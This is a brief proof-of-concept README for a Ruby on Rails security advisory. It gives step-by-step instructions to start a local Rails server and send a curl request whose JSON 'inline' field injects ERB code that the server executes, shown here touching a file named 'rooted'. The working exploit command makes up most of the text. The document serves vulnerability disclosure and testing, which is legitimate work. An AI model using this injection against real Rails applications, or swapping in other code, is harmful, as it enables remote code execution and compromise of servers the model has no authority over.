Proof of concept for groups.google.com/forum/#!topic/rubyonrails-security/ly-IH-fxr_Q
-
You should only run rails server in a way that you are certain will not open you up to being exploited
-
Run ‘rails s`
-
Execute the following command
‘curl -v -H “Accept: application/json” -H “Content-type: application/json” -X GET -d ’ {“id” : { “inline” : “<%= FileUtils.touch "rooted"%>”}}‘ localhost:3000/exploits`
-
Verify that the file “rooted” now exists in the project directory